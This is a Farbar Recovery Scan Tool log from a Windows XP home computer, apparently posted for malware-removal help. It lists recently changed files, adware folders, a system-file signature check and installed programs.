2014-08-16 15:40 - 2014-08-16 15:40 - 00000000 ____D () C:\Program Files\predm
2014-08-10 19:59 - 2014-08-15 22:54 - 00022758 _____ () C:\Documents and Settings\Jay\Desktop\attach.txt
2014-08-10 19:59 - 2014-08-15 22:54 - 00018225 _____ () C:\Documents and Settings\Jay\Desktop\dds.txt
2014-08-10 19:57 - 2014-08-10 19:59 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\ea5b54591d578367
2014-08-10 19:46 - 2014-08-14 23:09 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Browser System Enahncer
2014-08-10 19:46 - 2014-08-10 19:46 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\2308189059
2014-08-10 19:41 - 2014-08-21 21:36 - 00000000 ____D () C:\Documents and Settings\Jay\Local Settings\temp
2014-08-10 19:41 - 2014-08-10 19:41 - 00023603 _____ () C:\ComboFix.txt
2014-08-10 19:41 - 2014-08-10 19:41 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\temp
2014-08-10 19:41 - 2014-08-10 19:41 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\temp
2014-08-10 19:02 - 2014-08-16 15:39 - 00000000 ____D () C:\Program Files\Groovorio
2014-08-10 19:02 - 2014-08-10 19:41 - 00000000 ____D () C:\Qoobox
2014-08-10 19:02 - 2014-08-10 19:02 - 00000000 ____D () C:\Program Files\ToggleMark
2014-08-10 19:02 - 2011-06-26 00:45 - 00256000 _____ () C:\WINDOWS\PEV.exe
2014-08-10 19:02 - 2010-11-07 11:20 - 00208896 _____ () C:\WINDOWS\MBR.exe
2014-08-10 19:02 - 2009-04-19 22:56 - 00060416 _____ (NirSoft) C:\WINDOWS\NIRCMD.exe
2014-08-10 19:02 - 2000-08-30 18:00 - 00518144 _____ (SteelWerX) C:\WINDOWS\SWREG.exe
2014-08-10 19:02 - 2000-08-30 18:00 - 00406528 _____ (SteelWerX) C:\WINDOWS\SWSC.exe
2014-08-10 19:02 - 2000-08-30 18:00 - 00212480 _____ (SteelWerX) C:\WINDOWS\SWXCACLS.exe
2014-08-10 19:02 - 2000-08-30 18:00 - 00098816 _____ () C:\WINDOWS\sed.exe
2014-08-10 19:02 - 2000-08-30 18:00 - 00080412 _____ () C:\WINDOWS\grep.exe
2014-08-10 19:02 - 2000-08-30 18:00 - 00068096 _____ () C:\WINDOWS\zip.exe
2014-08-10 18:59 - 2014-08-10 18:59 - 00000000 ____D () C:\Documents and Settings\Jay\My Documents\Optimizer Pro
2014-08-10 18:59 - 2014-08-10 18:59 - 00000000 ____D () C:\Documents and Settings\Jay\Application Data\VOPackage
2014-08-10 18:58 - 2014-08-10 18:59 - 00000000 ____D () C:\Documents and Settings\Jay\Local Settings\Application Data\Linkey
2014-08-10 18:58 - 2014-08-10 18:58 - 00000000 ____D () C:\Program Files\Settings Manager
2014-08-10 18:58 - 2014-08-10 18:58 - 00000000 ____D () C:\Documents and Settings\Jay\Application Data\FirefoxToolbar
2014-08-10 18:57 - 2014-08-21 21:37 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\smdmf
2014-08-10 18:57 - 2014-08-14 23:12 - 00000000 ____D () C:\Program Files\005
2014-08-10 18:54 - 2014-08-10 18:54 - 00000000 ____D () C:\Documents and Settings\Jay\Local Settings\Application Data\SearchProtect
2014-08-10 18:54 - 2014-08-10 18:54 - 00000000 _____ () C:\END
2014-08-10 14:35 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\WINDOWS\system32\sqlite3.dll
2014-08-10 14:32 - 2014-08-10 15:55 - 00000000 ____D () C:\AdwCleaner
2014-08-10 14:31 - 2014-08-10 14:31 - 01366203 _____ () C:\Documents and Settings\Jay\Desktop\AdwCleaner.exe
2014-08-10 14:28 - 2014-08-10 14:30 - 00000000 ____D () C:\Program Files\Mozilla Firefox

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-21 21:37 - 2014-08-10 18:57 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\smdmf
2014-08-21 21:36 - 2014-08-10 19:41 - 00000000 ____D () C:\Documents and Settings\Jay\Local Settings\temp
2014-08-21 21:35 - 2014-08-21 21:35 - 00000000 ____D () C:\FRST
2014-08-21 21:33 - 2006-07-19 20:11 - 01762402 _____ () C:\WINDOWS\WindowsUpdate.log
2014-08-21 21:32 - 2014-08-17 12:00 - 00011864 _____ () C:\WINDOWS\KB2929961.log
2014-08-21 21:32 - 2014-08-17 11:38 - 00010910 _____ () C:\WINDOWS\KB2691442.log
2014-08-21 21:32 - 2014-08-17 11:38 - 00010850 _____ () C:\WINDOWS\KB2719985.log
2014-08-21 21:31 - 2014-08-21 21:31 - 00000000 ____D () C:\WINDOWS\LastGood
2014-08-21 21:30 - 2011-09-02 17:22 - 00000000 ____D () C:\Program Files\SUPERAntiSpyware
2014-08-21 21:23 - 2012-07-11 22:15 - 00000364 ____H () C:\WINDOWS\Tasks\avast! Emergency Update.job
2014-08-21 21:22 - 2013-03-21 12:14 - 00000876 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2014-08-21 21:22 - 2010-10-10 11:26 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy
2014-08-21 21:22 - 2006-07-19 20:11 - 00001158 _____ () C:\WINDOWS\system32\wpa.dbl
2014-08-21 21:22 - 2006-07-19 20:11 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2014-08-21 21:22 - 2006-07-19 12:40 - 00000159 _____ () C:\WINDOWS\wiadebug.log
2014-08-21 21:22 - 2006-07-19 12:40 - 00000049 _____ () C:\WINDOWS\wiaservc.log
2014-08-21 21:21 - 2006-07-19 20:11 - 00032412 _____ () C:\WINDOWS\SchedLgU.Txt
2014-08-21 21:20 - 2010-10-10 11:26 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
2014-08-21 21:20 - 2007-04-18 17:05 - 00000178 ___SH () C:\Documents and Settings\Jay\ntuser.ini
2014-08-21 21:20 - 2007-04-18 17:05 - 00000000 ____D () C:\Documents and Settings\Jay
2014-08-21 21:12 - 2007-04-25 15:00 - 00000178 ___SH () C:\Documents and Settings\Jenny\ntuser.ini
2014-08-21 21:12 - 2007-04-25 15:00 - 00000000 ____D () C:\Documents and Settings\Jenny
2014-08-21 21:11 - 2013-03-21 12:14 - 00000880 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2014-08-21 21:01 - 2013-12-05 17:13 - 00000830 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2014-08-21 19:56 - 2011-09-02 22:18 - 00000000 ____D () C:\Documents and Settings\Jenny\Local Settings\temp
2014-08-21 19:54 - 2011-10-29 14:48 - 00497256 _____ () C:\WINDOWS\setupapi.log
2014-08-21 14:01 - 2006-07-19 20:05 - 00000000 ____D () C:\WINDOWS\Microsoft.NET
2014-08-21 12:47 - 2014-08-17 12:01 - 00011954 _____ () C:\WINDOWS\KB2916036.log
2014-08-21 12:47 - 2014-08-17 12:01 - 00011952 _____ () C:\WINDOWS\KB2922229.log
2014-08-21 12:47 - 2014-08-17 12:01 - 00011944 _____ () C:\WINDOWS\KB2868626.log
2014-08-21 12:47 - 2014-08-17 11:38 - 00011022 _____ () C:\WINDOWS\KB2712808.log
2014-08-21 12:46 - 2014-08-17 12:00 - 00086464 _____ () C:\WINDOWS\KB2936068-IE7.log
2014-08-21 12:46 - 2014-08-17 12:00 - 00011944 _____ () C:\WINDOWS\KB2847311.log
2014-08-21 12:46 - 2014-08-17 12:00 - 00011867 _____ () C:\WINDOWS\KB2898715.log
2014-08-21 12:46 - 2014-08-17 12:00 - 00011779 _____ () C:\WINDOWS\KB2802968.log
2014-08-21 12:46 - 2014-08-17 11:38 - 00011131 _____ () C:\WINDOWS\KB2655992.log
2014-08-21 12:46 - 2014-08-17 11:38 - 00010938 _____ () C:\WINDOWS\KB2585542.log
2014-08-21 12:46 - 2014-08-17 11:38 - 00010691 _____ () C:\WINDOWS\KB2631813.log
2014-08-21 12:46 - 2014-08-17 11:38 - 00010600 _____ () C:\WINDOWS\KB2598479.log
2014-08-21 12:45 - 2014-08-17 12:00 - 00012862 _____ () C:\WINDOWS\KB2909212.log
2014-08-21 12:39 - 2014-08-17 11:59 - 00011708 _____ () C:\WINDOWS\KB2780091.log
2014-08-21 12:38 - 2014-08-17 11:40 - 00012559 _____ () C:\WINDOWS\KB2930275.log
2014-08-21 12:38 - 2014-08-17 11:40 - 00011815 _____ () C:\WINDOWS\KB2862152.log
2014-08-21 12:38 - 2014-08-17 11:40 - 00011785 _____ () C:\WINDOWS\KB2876217.log
2014-08-21 12:38 - 2014-08-17 11:40 - 00011779 _____ () C:\WINDOWS\KB2864063.log
2014-08-21 12:26 - 2009-10-25 15:49 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-08-21 12:26 - 2006-07-19 20:00 - 00347400 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
2014-08-18 22:58 - 2014-08-18 22:58 - 00000000 ____D () C:\4ea9f4d50c4d13298e29e45991c07f
2014-08-18 22:58 - 2006-07-19 20:11 - 01176233 _____ () C:\WINDOWS\tsoc.log
2014-08-18 22:58 - 2006-07-19 20:11 - 00846930 _____ () C:\WINDOWS\iis6.log
2014-08-18 22:58 - 2006-07-19 20:01 - 02563278 _____ () C:\WINDOWS\FaxSetup.log
2014-08-18 22:58 - 2006-07-19 20:01 - 01243769 _____ () C:\WINDOWS\ocgen.log
2014-08-18 22:58 - 2006-07-19 20:01 - 00833778 _____ () C:\WINDOWS\comsetup.log
2014-08-18 22:58 - 2006-07-19 20:01 - 00796358 _____ () C:\WINDOWS\msmqinst.log
2014-08-18 22:58 - 2006-07-19 20:01 - 00505896 _____ () C:\WINDOWS\ntdtcsetup.log
2014-08-18 22:58 - 2006-07-19 20:01 - 00447502 _____ () C:\WINDOWS\netfxocm.log
2014-08-18 22:58 - 2006-07-19 20:01 - 00176996 _____ () C:\WINDOWS\MedCtrOC.log
2014-08-18 22:58 - 2006-07-19 20:01 - 00137476 _____ () C:\WINDOWS\ocmsn.log
2014-08-18 22:58 - 2006-07-19 20:01 - 00128338 _____ () C:\WINDOWS\tabletoc.log
2014-08-18 22:58 - 2006-07-19 20:01 - 00128263 _____ () C:\WINDOWS\msgsocm.log
2014-08-18 22:58 - 2006-07-19 20:01 - 00001374 _____ () C:\WINDOWS\imsins.log
2014-08-18 22:57 - 2014-08-18 22:57 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2770660$
2014-08-18 22:57 - 2009-12-02 22:43 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Microsoft Help
2014-08-18 22:56 - 2014-08-18 22:56 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2850869$
2014-08-18 22:56 - 2014-08-17 11:40 - 00142501 _____ () C:\WINDOWS\KB2850869.log
2014-08-18 22:56 - 2006-07-19 20:01 - 00001374 _____ () C:\WINDOWS\imsins.BAK
2014-08-18 22:56 - 2006-07-19 19:58 - 00344115 _____ () C:\WINDOWS\updspapi.log
2014-08-18 22:55 - 2014-08-18 22:55 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2876331$
2014-08-18 22:55 - 2014-08-18 22:55 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2859537$
2014-08-18 22:55 - 2014-08-18 22:54 - 00136378 _____ () C:\WINDOWS\KB2807986.log
2014-08-18 22:55 - 2014-08-17 11:40 - 00141957 _____ () C:\WINDOWS\KB2876331.log
2014-08-18 22:55 - 2014-08-17 11:39 - 00142756 _____ () C:\WINDOWS\KB2859537.log
2014-08-18 22:54 - 2014-08-18 22:54 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2807986$
2014-08-18 22:54 - 2006-07-19 19:58 - 00000000 ___HD () C:\WINDOWS\$hf_mig$
2014-08-18 22:53 - 2006-07-19 20:06 - 00006276 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
2014-08-18 22:43 - 2014-08-18 22:43 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2868038$
2014-08-18 22:43 - 2014-08-18 22:42 - 00133967 _____ () C:\WINDOWS\KB2868038.log
2014-08-18 22:42 - 2014-08-17 11:39 - 00142864 _____ () C:\WINDOWS\KB2820917.log
2014-08-18 22:41 - 2014-08-18 22:41 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2820917$
2014-08-18 22:37 - 2014-08-18 22:37 - 00133872 _____ () C:\WINDOWS\KB2603381.log
2014-08-18 22:37 - 2014-08-18 22:37 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2893294$
2014-08-18 22:37 - 2014-08-18 22:37 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2757638$
2014-08-18 22:37 - 2014-08-18 22:37 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2603381$
2014-08-18 22:37 - 2014-08-17 11:39 - 00141918 _____ () C:\WINDOWS\KB2757638.log
2014-08-18 22:37 - 2014-08-17 11:39 - 00139690 _____ () C:\WINDOWS\KB2893294.log
2014-08-18 22:35 - 2014-08-18 22:35 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2749655$
2014-08-18 22:35 - 2014-08-18 22:35 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2653956$
2014-08-18 22:35 - 2014-08-17 11:39 - 00142032 _____ () C:\WINDOWS\KB2749655.log
2014-08-18 22:35 - 2014-08-17 11:37 - 00139623 _____ () C:\WINDOWS\KB2653956.log
2014-08-18 22:33 - 2010-06-05 09:14 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Silverlight
2014-08-18 22:33 - 2007-10-25 20:31 - 00000000 ____D () C:\Documents and Settings\Jay\Desktop\hijackthis
2014-08-18 22:32 - 2014-08-18 22:32 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2892075$
2014-08-18 22:32 - 2014-08-18 22:31 - 00013937 _____ () C:\WINDOWS\KB2698365.log
2014-08-18 22:32 - 2014-08-17 11:39 - 00018123 _____ () C:\WINDOWS\KB2892075.log
2014-08-18 22:31 - 2014-08-18 22:31 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2698365$
2014-08-18 22:31 - 2014-08-18 22:31 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2619339$
2014-08-18 22:31 - 2014-08-17 11:37 - 00019056 _____ () C:\WINDOWS\KB2619339.log
2014-08-18 22:30 - 2014-08-18 22:30 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2705219-v2$
2014-08-18 22:30 - 2014-08-17 11:39 - 00020643 _____ () C:\WINDOWS\KB2705219-v2.log
2014-08-18 22:25 - 2014-08-18 22:25 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2727528$
2014-08-18 22:25 - 2014-08-18 22:24 - 00012472 _____ () C:\WINDOWS\KB2723135-v2.log
2014-08-18 22:25 - 2014-08-17 11:39 - 00019333 _____ () C:\WINDOWS\KB2727528.log
2014-08-18 22:24 - 2014-08-18 22:24 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2723135-v2$
2014-08-18 22:23 - 2014-08-18 22:23 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2862330$
2014-08-18 22:19 - 2014-08-17 11:30 - 00019733 _____ () C:\WINDOWS\KB2813345.log
2014-08-18 22:18 - 2014-08-18 22:18 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2813345$
2014-08-18 22:15 - 2014-08-17 11:30 - 00021923 _____ () C:\WINDOWS\KB2676562.log
2014-08-18 22:15 - 2006-07-19 19:43 - 00000719 _____ () C:\WINDOWS\win.ini
2014-08-18 22:14 - 2014-08-18 22:14 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2676562$
2014-08-18 22:08 - 2009-08-22 14:09 - 00000000 ____D () C:\WINDOWS\system32\XPSViewer
2014-08-18 21:43 - 2014-08-17 11:28 - 00017799 _____ () C:\WINDOWS\KB2620712.log
2014-08-18 21:42 - 2014-08-18 21:42 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2620712$
2014-08-18 21:40 - 2014-08-18 21:40 - 00008357 _____ () C:\WINDOWS\KB2914368.log
2014-08-18 21:40 - 2014-08-18 21:40 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2914368$
2014-08-18 21:40 - 2014-08-18 21:40 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2584146$
2014-08-18 21:40 - 2014-08-17 11:25 - 00016947 _____ () C:\WINDOWS\KB2584146.log
2014-08-17 21:42 - 2014-08-17 12:54 - 00015602 _____ () C:\Documents and Settings\Jay\Desktop\Stock Tracker.xlsx
2014-08-17 12:54 - 2014-08-17 12:54 - 00000165 ____H () C:\Documents and Settings\Jay\Desktop\~$Stock Tracker.xlsx
2014-08-17 12:07 - 2012-02-15 17:00 - 00000000 ____D () C:\Documents and Settings\Jenny\My Documents\Pampered Chef
2014-08-17 12:05 - 2009-12-02 23:35 - 00107008 ___SH () C:\Documents and Settings\Jenny\Desktop\Thumbs.db
2014-08-17 08:59 - 2006-07-19 20:10 - 00000000 ____D () C:\WINDOWS\Help
2014-08-16 15:59 - 2008-10-23 16:45 - 00000000 ____D () C:\WINDOWS\system32\Adobe
2014-08-16 15:59 - 2007-04-29 00:37 - 00000000 ____D () C:\Documents and Settings\Jay\Application Data\Adobe
2014-08-16 15:59 - 2007-04-18 17:15 - 00000000 ____D () C:\Documents and Settings\Jay\Application Data\Macromedia
2014-08-16 15:59 - 2006-07-19 19:42 - 00000000 ____D () C:\WINDOWS\system32\Macromed
2014-08-16 15:40 - 2014-08-16 15:40 - 00000000 ____D () C:\Program Files\predm
2014-08-16 15:39 - 2014-08-10 19:02 - 00000000 ____D () C:\Program Files\Groovorio
2014-08-15 22:54 - 2014-08-10 19:59 - 00022758 _____ () C:\Documents and Settings\Jay\Desktop\attach.txt
2014-08-15 22:54 - 2014-08-10 19:59 - 00018225 _____ () C:\Documents and Settings\Jay\Desktop\dds.txt
2014-08-14 23:12 - 2014-08-10 18:57 - 00000000 ____D () C:\Program Files\005
2014-08-14 23:09 - 2014-08-10 19:46 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Browser System Enahncer
2014-08-10 22:12 - 2006-07-19 19:46 - 00000000 __SHD () C:\Documents and Settings\NetworkService
2014-08-10 20:57 - 2013-04-09 20:48 - 00002503 _____ () C:\Documents and Settings\Jay\Desktop\Launch Google Earth.lnk
2014-08-10 20:49 - 2006-07-19 19:46 - 00000000 __SHD () C:\Documents and Settings\LocalService
2014-08-10 19:59 - 2014-08-10 19:57 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\ea5b54591d578367
2014-08-10 19:46 - 2014-08-10 19:46 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\2308189059
2014-08-10 19:41 - 2014-08-10 19:41 - 00023603 _____ () C:\ComboFix.txt
2014-08-10 19:41 - 2014-08-10 19:41 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\temp
2014-08-10 19:41 - 2014-08-10 19:41 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\temp
2014-08-10 19:41 - 2014-08-10 19:02 - 00000000 ____D () C:\Qoobox
2014-08-10 19:33 - 2014-08-18 22:44 - 00000027 _____ () C:\WINDOWS\system32\Drivers\etc\hosts.20140818-224430.backup
2014-08-10 19:33 - 2006-07-19 12:37 - 00000435 _____ () C:\WINDOWS\system.ini
2014-08-10 19:31 - 2010-10-13 18:05 - 00008192 ____H () C:\WINDOWS\system32\config\SECURITY.tmp.LOG
2014-08-10 19:31 - 2006-07-19 20:11 - 39059456 _____ () C:\WINDOWS\system32\config\software.bak
2014-08-10 19:31 - 2006-07-19 20:11 - 07340032 _____ () C:\WINDOWS\system32\config\system.bak
2014-08-10 19:31 - 2006-07-19 20:11 - 00524288 _____ () C:\WINDOWS\system32\config\default.bak
2014-08-10 19:31 - 2006-07-19 20:11 - 00262144 _____ () C:\WINDOWS\system32\config\SECURITY.bak
2014-08-10 19:31 - 2006-07-19 20:11 - 00028672 _____ () C:\WINDOWS\system32\config\SAM.bak
2014-08-10 19:30 - 2010-10-11 19:40 - 00000000 ____D () C:\WINDOWS\ERDNT
2014-08-10 19:13 - 2006-07-19 20:11 - 00000000 ____D () C:\WINDOWS\system32\Restore
2014-08-10 19:02 - 2014-08-10 19:02 - 00000000 ____D () C:\Program Files\ToggleMark
2014-08-10 18:59 - 2014-08-10 18:59 - 00000000 ____D () C:\Documents and Settings\Jay\My Documents\Optimizer Pro
2014-08-10 18:59 - 2014-08-10 18:59 - 00000000 ____D () C:\Documents and Settings\Jay\Application Data\VOPackage
2014-08-10 18:59 - 2014-08-10 18:58 - 00000000 ____D () C:\Documents and Settings\Jay\Local Settings\Application Data\Linkey
2014-08-10 18:58 - 2014-08-10 18:58 - 00000000 ____D () C:\Program Files\Settings Manager
2014-08-10 18:58 - 2014-08-10 18:58 - 00000000 ____D () C:\Documents and Settings\Jay\Application Data\FirefoxToolbar
2014-08-10 18:54 - 2014-08-10 18:54 - 00000000 ____D () C:\Documents and Settings\Jay\Local Settings\Application Data\SearchProtect
2014-08-10 18:54 - 2014-08-10 18:54 - 00000000 _____ () C:\END
2014-08-10 15:57 - 2012-04-24 22:36 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-08-10 15:55 - 2014-08-10 14:32 - 00000000 ____D () C:\AdwCleaner
2014-08-10 14:31 - 2014-08-10 14:31 - 01366203 _____ () C:\Documents and Settings\Jay\Desktop\AdwCleaner.exe
2014-08-10 14:30 - 2014-08-10 14:28 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-08-10 13:38 - 2010-06-28 22:42 - 00000458 _____ () C:\rkill.log
2014-08-02 17:03 - 2006-07-19 19:41 - 00000000 ____D () C:\WINDOWS\system32\FxsTmp
2014-07-25 23:52 - 2010-01-29 13:10 - 00000000 ____D () C:\Program Files\Atrinsic
2014-07-25 23:51 - 2012-09-02 16:32 - 00005632 ___SH () C:\WINDOWS\Thumbs.db
2014-07-25 23:51 - 2007-04-28 03:44 - 00007168 _____ () C:\Documents and Settings\Jay\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-07-25 21:36 - 2008-10-18 13:42 - 00001324 _____ () C:\WINDOWS\system32\d3d9caps.dat
2014-07-23 13:54 - 2013-04-12 16:55 - 00000000 ____D () C:\Documents and Settings\Jay\My Documents\My Scans

Files to move or delete:
====================
C:\Documents and Settings\Jenny\PPPlus-Jennifer-Eatchel-20111221-1532.dat
C:\Documents and Settings\Jenny\PPPlus-Jennifer-Eatchel-20120224-1833.dat
C:\Documents and Settings\Jenny\PPPlus-Jennifer-Eatchel-20120331-1231.dat
C:\Documents and Settings\Jenny\PPPlus-Jennifer-Eatchel-20120925-2039.dat
C:\Documents and Settings\Jenny\PPPlus-Jennifer-Eatchel-20121213-2244.dat


Some content of TEMP:
====================
C:\Documents and Settings\Jay\Local Settings\temp\nsc32B.tmp.exe
C:\Documents and Settings\Jenny\Local Settings\temp\jre-6u29-windows-i586-iftw-rv.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

==================== End Of Log ============================

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version:21-08-2014
Ran by Jay at 2014-08-21 21:38:21
Running from C:\Documents and Settings\Jay\My Documents\Downloads
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: avast! Internet Security (Disabled - Up to date) {7591DB91-41F0-48A3-B128-1A293FD8233D}
FW: avast! Internet Security (Disabled) {7591DB91-41F0-48A3-B128-1A293FD8233D}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

2007 Microsoft Office system (HKLM\...\PROHYBRIDR) (Version: 12.0.6425.1000 - Microsoft Corporation)
32 Bit HP CIO Components Installer (Version: 7.1.8 - Hewlett-Packard) Hidden
Acer eDataSecurity Management (Version: 2.0.3077 - Acer) Hidden
Acer WLAN 11g USB Dongle (HKLM\...\InstallShield_{0CB98AC0-D691-4B21-AD3D-95982517021D}) (Version: 1.0.8 - ACER Inc.)
Acer WLAN 11g USB Dongle (Version: 1.0.8 - ACER Inc.) Hidden
Actiontec Gateway (HKLM\...\{9692FD03-6662-4E62-B08C-30DFF51651E1}) (Version:  - )
Adobe AIR (HKLM\...\Adobe AIR) (Version: 13.0.0.111 - Adobe Systems Incorporated)
Adobe AIR (Version: 13.0.0.111 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 14 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Flash Player 14 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Photoshop Elements 2.0 (HKLM\...\Adobe Photoshop Elements 2.0) (Version: 2.0 - Adobe Systems, Inc.)
Adobe Reader XI (11.0.08) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.08 - Adobe Systems Incorporated)
Amazon Games & Software Downloader (HKLM\...\Amazon Games & Software Downloader_is1) (Version: 2.0.0.0 - Amazon)
Angry Birds (HKLM\...\{2F7D5734-056F-4A0A-A1C7-CA1AAE5BB1EB}) (Version: 1.6.3.1 - Rovio)
Apple Application Support (HKLM\...\{F5266D28-E0B2-4130-BFC5-EE155AD514DC}) (Version: 2.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{D4DDFAA1-EC37-4529-AD5B-A433ADE68662}) (Version: 6.0.0.59 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
avast! Internet Security (HKLM\...\avast) (Version: 8.0.1489.0 - AVAST Software)
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
Browser System Enahncer (HKLM\...\{5F189DF5-2D05-472B-9091-84D9848AE48B}{19275d4b}) (Version:  - WorldLoad) <==== ATTENTION
BufferChm (Version: 140.0.212.000 - Hewlett-Packard) Hidden
Canon Camera WIA Driver (Version: 5.3 - Canon) Hidden
Canon Camera WIA Driver (Version: 5.4 - Canon) Hidden
Canon Camera WIA Driver (Version: 5.5 - Canon) Hidden
Canon EOS 20D WIA Driver (HKLM\...\InstallShield_{ED9775A0-383E-4EAA-8DA5-8CC6860D60A3}) (Version: 5.4 - Canon)
Canon EOS-1D Mark II WIA Driver (HKLM\...\InstallShield_{C537C86E-22C0-41CF-8A8E-3B23E986C3D9}) (Version: 5.3 - Canon)
Canon EOS-1Ds Mark II WIA Driver (HKLM\...\InstallShield_{652C4ADF-0A29-4B02-9211-EE61675847DE}) (Version: 5.5 - Canon)
CANON iMAGE GATEWAY Task for ZoomBrowser EX (HKLM\...\CANON iMAGE GATEWAY Task) (Version: 1.7.2.11 - Canon Inc.)
Canon Internet Library for ZoomBrowser EX (HKLM\...\Canon Internet Library for ZoomBrowser EX) (Version: 1.6.3.9 - Canon Inc.)
Canon MOV Decoder (HKLM\...\Canon MOV Decoder) (Version: 1.5.0.7 - Canon Inc.)
Canon MOV Encoder (HKLM\...\Canon MOV Encoder) (Version: 1.3.1.3 - Canon Inc.)
Canon MovieEdit Task for ZoomBrowser EX (HKLM\...\MovieEditTask) (Version: 3.4.1.9 - Canon Inc.)
Canon Utilities Digital Photo Professional 3.8 (HKLM\...\DPP) (Version: 3.8.1.0 - Canon Inc.)
Canon Utilities EOS Capture 1.2 (HKLM\...\InstallShield_{74BE7519-41A7-45A8-8AA6-78C7907A4808}) (Version: 1.2 - Canon)
Canon Utilities EOS Utility (HKLM\...\EOS Utility) (Version: 2.8.1.0 - Canon Inc.)
Canon Utilities EOS Viewer Utility 1.2 (HKLM\...\InstallShield_{750CF8D7-4B04-404F-AFA2-14C129C42373}) (Version: 1.2.1 - Canon)
Canon Utilities Original Data Security Tools (HKLM\...\Original Data Security Tools) (Version: 1.8.0.1 - Canon Inc.)
Canon Utilities PhotoStitch (HKLM\...\PhotoStitch) (Version: 3.1.22.46 - Canon Inc.)
Canon Utilities Picture Style Editor (HKLM\...\Picture Style Editor) (Version: 1.7.0.0 - Canon Inc.)
Canon Utilities WFT Utility (HKLM\...\WFTK) (Version: 3.5.1.1 - Canon Inc.)
Canon Utilities ZoomBrowser EX (HKLM\...\ZoomBrowser EX) (Version: 6.5.1.15 - Canon Inc.)
Canon ZoomBrowser EX Memory Card Utility (HKLM\...\ZoomBrowser EX Memory Card Utility) (Version: 1.3.0.4 - Canon Inc.)
Cisco Connect (HKLM\...\Cisco Connect) (Version: 1.4.13025.0 - Cisco Consumer Products LLC)
Critical Update for Windows Media Player 11 (KB959772) (HKLM\...\KB959772_WM11) (Version:  - Microsoft Corporation)
D110 (Version: 140.0.283.000 - Hewlett-Packard) Hidden
Destinations (Version: 140.0.77.000 - Hewlett-Packard) Hidden
DeviceDiscovery (Version: 140.0.212.000 - Hewlett-Packard) Hidden
EOS Capture 1.2 (Version: 1.2 - Canon) Hidden
